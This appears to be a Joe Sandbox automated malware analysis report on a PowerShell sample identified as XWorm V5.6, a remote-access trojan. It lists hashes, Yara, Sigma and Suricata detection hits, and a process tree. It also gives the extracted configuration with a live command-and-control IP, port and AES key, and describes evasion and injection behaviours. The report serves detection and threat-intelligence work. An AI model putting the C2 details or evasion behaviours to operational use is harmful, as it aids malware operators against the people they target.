Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WErY5oc4hl.ps1

Overview

General Information

Sample name:WErY5oc4hl.ps1
renamed because original name is a hash value
Original sample name:a7ee0a83c40c1d71e9730e1cbf6520b023952fb137a32a6449bd0edffcedf3d5.ps1
Analysis ID:1577166
MD5:f20ada3727c5c319d22931d7bc63a007
SHA1:242d29871bb91f4d3a48cdde6a46df7f458ae22a
SHA256:a7ee0a83c40c1d71e9730e1cbf6520b023952fb137a32a6449bd0edffcedf3d5
Tags:92-255-57-155ps1user-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 7516 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 7552 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7560 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 7280 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 1704 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xaa5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xaaf9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xac0e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xa81e:$cnc4: POST / HTTP/1.1
    00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x1a884:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x1a921:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x1aa36:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x1a646:$cnc4: POST / HTTP/1.1
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.RegSvcs.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          5.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xac5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xacf9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xae0e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xaa1e:$cnc4: POST / HTTP/1.1
          0.2.powershell.exe.21380403568.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.powershell.exe.21380403568.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x8e5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x8ef9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x900e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x8c1e:$cnc4: POST / HTTP/1.1
            0.2.powershell.exe.213812227a0.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 5 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", ProcessId: 7296, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1", ProcessId: 7296, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T08:15:42.687040+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:15:55.132992+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:15:58.442712+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:16:07.680452+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:16:20.460191+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:16:28.596991+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:16:32.774138+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:16:36.366021+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:16:43.293961+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:16:51.430755+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:16:58.869971+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:16:59.242947+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:04.430160+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:04.621094+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:04.743277+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:04.934293+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:15.291141+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:15.482157+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:20.387690+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:20.728031+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:21.133907+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:21.324994+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:28.636059+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:54.256561+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              2024-12-18T08:17:58.429921+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T08:15:42.745508+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:15:55.134693+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:16:07.682242+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:16:20.463819+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:16:32.775981+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:16:36.368542+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:16:43.296108+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:16:51.433298+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:16:59.247247+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:17:04.432459+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:17:04.622708+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:17:04.745103+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:17:04.943036+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:17:15.295456+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:17:15.486296+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:17:20.415519+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:17:21.143105+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              2024-12-18T08:17:21.327680+010028529231Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T08:15:58.442712+010028588011Malware Command and Control Activity Detected92.255.57.1554411192.168.2.749723TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T08:15:42.199229+010028588001Malware Command and Control Activity Detected192.168.2.74972392.255.57.1554411TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              Multi AV Scanner detection for submitted file
              Source: WErY5oc4hl.ps1Virustotal: Detection: 31%Perma Link
              Source: WErY5oc4hl.ps1ReversingLabs: Detection: 21%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Sample uses string decryption to hide its real strings
              Source: 0.2.powershell.exe.21380403568.0.unpackString decryptor: 92.255.57.155
              Source: 0.2.powershell.exe.21380403568.0.unpackString decryptor: 4411
              Source: 0.2.powershell.exe.21380403568.0.unpackString decryptor: P0WER
              Source: 0.2.powershell.exe.21380403568.0.unpackString decryptor: <Xwormmm>
              Source: 0.2.powershell.exe.21380403568.0.unpackString decryptor: XWorm V5.6
              Source: 0.2.powershell.exe.21380403568.0.unpackString decryptor: USB.exe
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb[ source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\RegSvcs.pdbF2 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb" source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB89 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb^2 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdbti4s|c;s source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb9\ source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdbj source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbH source: WERA716.tmp.dmp.12.dr
              Source: Binary string: ?koC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb% source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: %%.pdb)s( source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.pdb8 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbx source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: HP_o0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb: source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Management.pdbL0vw# source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Configuration.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Xml.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Windows.Forms.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2961772189.000000000611A000.00000004.00000020.00020000.00000000.sdmp, WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Drawing.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Management.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Management.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Core.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.pdb4 source: WERA716.tmp.dmp.12.dr
              Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: @ko.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49723 -> 92.255.57.155:4411
              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.155:4411 -> 192.168.2.7:49723
              Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49723 -> 92.255.57.155:4411
              Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.155:4411 -> 192.168.2.7:49723
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 92.255.57.155
              Source: global trafficTCP traffic: 192.168.2.7:49723 -> 92.255.57.155:4411
              Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: powershell.exe, 00000000.00000002.1448591065.0000021390218000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000000.00000002.1427937980.0000021380001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
              Source: powershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000000.00000002.1427937980.0000021380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000000.00000002.1448591065.0000021390218000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.21380403568.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.213812227a0.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
